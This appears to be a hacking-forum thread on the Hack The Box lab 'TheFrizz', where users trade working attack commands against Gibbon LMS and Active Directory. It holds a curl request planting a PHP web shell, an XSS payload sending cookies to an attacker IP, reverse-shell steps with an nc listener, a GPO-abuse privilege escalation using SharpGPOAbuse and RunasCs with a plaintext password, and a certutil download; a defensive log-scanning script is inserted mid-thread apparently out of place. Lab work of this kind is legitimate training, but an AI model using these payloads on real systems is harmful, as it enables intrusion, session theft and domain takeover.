TheFrizz Hack the Box Season 7 (Windows Medium)
by RedBlock - Saturday March 15, 2025 at 03:36 PM
Tks for your writeup

yep gtrngweuifniw
You can read this article, https://github.com/dgoorden/CVE-2023-45878, and use the py script to get a reverse shell directly. Very convenient.

(Mar 15, 2025, 09:07 PM)VoidNull Wrote:
(Mar 15, 2025, 08:42 PM)Adith19051905 Wrote: curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Planner/resources_addQuick_ajaxProcess.php" \
-F "id=body" \
-F "bodyfile1=@file.jpg;filename=<img src=x onerror=new Image().src='http://10.10.16.16:9001?cookie='+document.cookie>.jpg" \
-F "imagesAsLinks=Y" 

uploaded the file but nothing happening.

(Mar 15, 2025, 09:04 PM)Adith19051905 Wrote:
(Mar 15, 2025, 09:01 PM)VoidNull Wrote: I got a reverse shell with this, and using the following

https://www.revshells.com/
Powershell #3 Base64 encoding

how did you manage to get shell

Upload a web shell

curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"

Then generate a reverse shell with your IP and PORT on revshells.com using the PowerShell #3 (base64) option.

Then go to 
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=[Insert base64 encoded reverse shell]

Remember to listen to the port you declared on revshells.com.

nc -lvnp XXX

I'm running around trying to find a user flag

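I read the relevant PoC, but after sending the request in Burp I got "Your request failed due to an attachment error." It doesn't seem to have succeeded. Instead, I used the exploit script from GitHub and got a reverse shell.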
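
A defender-side view of the upload-then-request sequence described in the post above, as an added example that is not part of the thread or of any project it mentions: it scans web server access logs for a POST to rubrics_visualise_saveAjax.php followed by the first successful request to a .php script that had not been served before. The Apache combined log format, the function name and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache "combined" log lines for illustration; not from a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Mar/2025:20:58:01 +0000] "GET /Gibbon-LMS/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [15/Mar/2025:21:00:12 +0000] "POST /Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php HTTP/1.1" 200 9 "-" "curl/8.5.0"
10.0.0.9 - - [15/Mar/2025:21:00:40 +0000] "GET /Gibbon-LMS/shell.php?cmd=whoami HTTP/1.1" 200 23 "-" "curl/8.5.0"
10.0.0.5 - - [15/Mar/2025:21:01:02 +0000] "GET /Gibbon-LMS/index.php?q=/modules/Planner/planner.php HTTP/1.1" 200 7301 "-" "Mozilla/5.0"
10.0.0.9 - - [15/Mar/2025:21:01:30 +0000] "GET /Gibbon-LMS/missing.php HTTP/1.1" 404 196 "-" "curl/8.5.0"
"""

LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
# Endpoint named in the thread; compared lower-case because Windows paths are case-insensitive.
WRITE_ENDPOINT = "/modules/rubrics/rubrics_visualise_saveajax.php"


def find_new_scripts_after_write(log_text):
    """Return first-seen .php scripts served (2xx) after a POST to the write endpoint."""
    known = set()       # script paths already served earlier in this log window
    write_ips = set()   # clients that POSTed to the file-write endpoint
    findings = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m or not m["status"].startswith("2"):
            continue    # unparsable line or unsuccessful request
        url = urlsplit(m["target"])
        path = url.path.lower()
        if not path.endswith(".php"):
            continue
        if m["method"] == "POST" and path.endswith(WRITE_ENDPOINT):
            write_ips.add(m["ip"])
        elif write_ips and path not in known:
            findings.append({
                "script": path,
                "client": m["ip"],
                "time": m["ts"],
                "same_client": m["ip"] in write_ips,
                "params": sorted(parse_qs(url.query, keep_blank_values=True)),
            })
        known.add(path)
    return findings


if __name__ == "__main__":
    for finding in find_new_scripts_after_write(SAMPLE_LOG):
        print(finding)
```

The baseline of known scripts is only as good as the log window supplied, so feed it logs that start well before the suspected upload to keep legitimate pages from showing up as first-seen.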
bobthebuilder1111 Wrote:
bkbk Wrote:Can someone confirm if RunasCS works? I am not able to add myself in the local admins group with GPO

Just worked for me...  Below are the steps someone else posted earlier which I just ran and worked flawlessly.
I guess the only other possibility is the binaries in question...
wget https://github.com/byronkg/SharpGPOAbuse...OAbuse.exe
wget https://github.com/antonioCoco/RunasCs/r...unasCs.zip (then used the RunasCs.exe from this zip)

# get root
New-GPO -Name "doesnotmatter"
#add newlink to domain controllers
New-GPLink -Name "doesnotmatter" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
#add m.schoolbus to localadmin group
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName doesnotmatter
#force group policy update
gpupdate /force
#send yourself a revshell with admin rights:
.\RunasC.exe "M.SchoolBus" '!suBcig@MehTed!R' powershell.exe -r IP:9001

Thank you. I wound up getting it, the binary had compiled funky so had to redo it to make sure it was working right. PS: Always check your freshly compiled binaries, I lost maybe an hour to this lol

Hello guys!
How did you guys upload things? 'Cause I'm using certutil, got a 200 response on my server, but no exes uploaded in my directory.

PS C:\Temp> certutil -urlcache -f http://x.x.x.x:6666/RunasCs.zip C:\Temp\
**** Online ****


CertUtil: -URLCache command completed successfully.